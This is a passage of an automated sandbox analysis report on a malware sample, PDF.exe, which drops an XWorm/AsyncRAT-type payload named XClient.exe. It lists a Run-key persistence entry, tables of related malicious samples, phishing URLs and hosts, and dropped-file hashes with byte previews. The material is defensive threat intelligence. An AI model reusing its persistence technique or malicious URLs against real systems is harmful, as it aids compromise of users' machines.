                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target XClient.exe, PID 5296 because it is empty
                                    • Execution Graph export aborted for target XClient.exe, PID 8116 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 5012 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7492 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    12:13:59API Interceptor50x Sleep call for process: powershell.exe modified
                                    12:14:50API Interceptor294612x Sleep call for process: PDF.exe modified
                                    17:14:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Local\Temp\XClient.exe
                                    17:15:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Local\Temp\XClient.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    208.95.112.1Telegram.exeGet hashmaliciousZTratBrowse
                                    • ip-api.com/xml/?fields=countryCode,query
                                    N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                    • ip-api.com/json/?fields=225545
                                    N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                    • ip-api.com/json/?fields=225545
                                    trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
                                    • ip-api.com/line/?fields=hosting
                                    d3d9x.dllGet hashmaliciousXehook StealerBrowse
                                    • ip-api.com/json/?fields=11827
                                    400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                    • ip-api.com/json/?fields=11827
                                    400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                    • ip-api.com/json/?fields=11827
                                    INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    149.154.167.220soinjector.exeGet hashmaliciousUnknownBrowse
                                      n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                          client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                            https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
                                              LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                                                Invoice-2238562.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  INQUIRY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      SWIFT COPIES.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ip-api.comTelegram.exeGet hashmaliciousZTratBrowse
                                                        • 208.95.112.1
                                                        N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                        • 208.95.112.1
                                                        N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                        • 208.95.112.1
                                                        trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
                                                        • 208.95.112.1
                                                        d3d9x.dllGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        api.telegram.orgsoinjector.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                        • 149.154.167.220
                                                        https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                                                        • 149.154.167.220
                                                        Invoice-2238562.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        INQUIRY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SWIFT COPIES.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TELEGRAMRUsoinjector.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                        • 149.154.167.220
                                                        https://telegrern.icu/?8a18ab92c44a9607e8cddc31d16d5729Get hashmaliciousTelegram PhisherBrowse
                                                        • 149.154.167.99
                                                        https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                                                        • 149.154.167.220
                                                        d3d9x.dllGet hashmaliciousXehook StealerBrowse
                                                        • 149.154.167.99
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 149.154.167.99
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 149.154.167.99
                                                        TUT-ASUSTelegram.exeGet hashmaliciousZTratBrowse
                                                        • 208.95.112.1
                                                        N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                        • 208.95.112.1
                                                        N7bEDDO8u6.exeGet hashmaliciousBlank Grabber, DCRat, Njrat, Umbral Stealer, XWormBrowse
                                                        • 208.95.112.1
                                                        trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
                                                        • 208.95.112.1
                                                        wfJfUGeGT3.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                        • 208.95.112.1
                                                        d3d9x.dllGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                                                        • 208.95.112.1
                                                        INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        AS43260TRb3astmode.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 185.124.86.100
                                                        sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 45.131.197.225
                                                        CC59PrIst7.exeGet hashmaliciousDCRat, RedLineBrowse
                                                        • 77.73.129.75
                                                        SecuriteInfo.com.Malware.Win32.Obfus.32567.16915.exeGet hashmaliciousUnknownBrowse
                                                        • 93.190.8.86
                                                        TRANSFERENCIA A CEMMSA.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.160.31.16
                                                        SecuriteInfo.com.BScope.Trojan.Chapak.5450.15581.exeGet hashmaliciousUnknownBrowse
                                                        • 185.29.120.106
                                                        SecuriteInfo.com.BScope.Trojan.Chapak.5450.15581.exeGet hashmaliciousUnknownBrowse
                                                        • 185.29.120.106
                                                        DHL_046s01900330081250b4057885831102020.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 185.160.31.16
                                                        5f1uj5aMdD.elfGet hashmaliciousUnknownBrowse
                                                        • 95.130.172.49
                                                        SecuriteInfo.com.Trojan.005abd811.9569.17117.exeGet hashmaliciousUnknownBrowse
                                                        • 185.29.120.106

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0estub.exeGet hashmaliciousStealeriumBrowse
                                                        • 149.154.167.220
                                                        snake.mal.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        snake.mal.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        jFzg3KFP48.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        BsMXrWBfhT.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        BsMXrWBfhT.exeGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        n0PDCyrFnf.exeGet hashmaliciousPureLog StealerBrowse
                                                        • 149.154.167.220
                                                        https://uppholldlgins.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        http://www.chacararecantodosol.com.br/wp-admin/js/milissa/swisssa2024/swisscom/index2.phpGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\XClient.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):654
                                                        Entropy (8bit):5.380476433908377
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):64
                                                        Entropy (8bit):0.34726597513537405
                                                        Encrypted:false
                                                        SSDEEP:3:Nlll:Nll
                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                        Malicious:false
                                                        Preview:@...e...........................................................

                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PDF.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):35
                                                        Entropy (8bit):3.7071562309216133
                                                        Encrypted:false
                                                        SSDEEP:3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
                                                        MD5:BFABEC865892A34F532FABF984F7E156
                                                        SHA1:3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
                                                        SHA-256:8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
                                                        SHA-512:CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
                                                        Malicious:false
                                                        Preview:....### explorer ###..[WIN]r[WIN]r

                                                        C:\Users\user\AppData\Local\Temp\XClient.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\PDF.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):144384
                                                        Entropy (8bit):5.133305429579929
                                                        Encrypted:false
                                                        SSDEEP:3072:4uvZ0XFL9YcO++x1M+lmsolAIrRuw+mqv9j1MWLQJ:4eZ01L9eI+lDAA
                                                        MD5:887DC892255E963FC4D834FFD5D92079
                                                        SHA1:5B322AB6D21829DDA8EFFD690E9B4A1C8AD8DB8F
                                                        SHA-256:D483C827B461C93286DC9195DFBD8007A3C6FB19F8ECFA97B60410390AA2BF63
                                                        SHA-512:EDE2EC0FBA093F1AC3340B3E59E4CBA405E7A4339FF98368408782227A9CA956A6CD595D78D5F308665E516B677EC64504DC8780F370C9E844F0DE23E2B8F5D8
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 87%
                                                        • Antivirus: Virustotal, Detection: 81%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@.................................|...O.......d............................................................................ ............... ..H............text....... ...................... ..`.rsrc...d...........................@..@.reloc...............2..............@..B........................H........a...a............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t4f1zhy.vks.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33nkn4nr.0kb.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hnxsbv3.r14.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5c0kazp1.vdg.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bicpcwxf.cpa.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cabcqsr0.vel.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz2nxz4j.lf5.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jav55545.y45.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2lmzdkt.kuv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lns0gbfq.r5r.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj1wj1wl.m0r.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odka4pk1.5jz.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkl00lyf.s4r.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
